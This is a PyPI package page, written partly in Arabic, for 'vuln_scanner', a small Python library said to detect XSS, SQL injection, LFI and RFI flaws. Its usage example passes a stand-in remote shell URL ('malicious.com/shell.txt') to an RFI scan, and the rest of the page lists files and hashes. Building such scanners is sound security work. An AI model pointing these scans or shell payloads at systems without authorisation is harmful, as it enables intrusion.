مكتبة للكشف عن ثغرات XSS، SQL Injection، LFI، و RFI
Project description
vuln_scanner
مكتبة بايثون لاكتشاف الثغرات الشائعة مثل XSS، SQL Injection، LFI، و RFI.
الاستخدام
from vuln_scanner import scan_xss, scan_sql_injection, scan_lfi, scan_rfi
url = "http://example.com"
external_url = "http://malicious.com/shell.txt"
scan_xss(url)
scan_sql_injection(url)
scan_lfi(url)
scan_rfi(url, external_url)
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
vuln_scanner-0.1.tar.gz
(2.2 kB
view details)
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file vuln_scanner-0.1.tar.gz.
File metadata
- Download URL: vuln_scanner-0.1.tar.gz
- Upload date:
- Size: 2.2 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.11.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
2581671f27996d8cf2016aff2abdf93e8c4235cc9e4a7d646c475791b72d1364
|
|
| MD5 |
5c634e0a9a51dd5cb509bbe2a7f51ae0
|
|
| BLAKE2b-256 |
2faa88e62bb45a6373d456337f7686e909fc7fc4db032f9496a73d79afee5f5b
|
File details
Details for the file vuln_scanner-0.1-py3-none-any.whl.
File metadata
- Download URL: vuln_scanner-0.1-py3-none-any.whl
- Upload date:
- Size: 2.3 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/5.1.1 CPython/3.11.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
85cc430e7a533442c3494c801f6a78db3cd5bb559577aa1feeed28bc6eae18b0
|
|
| MD5 |
c1b7256172a2e2d1f2c46a994673b4bd
|
|
| BLAKE2b-256 |
7f96e84dd001a598822135edc9a548af9e82b387382c4fc6f1874478f75e9027
|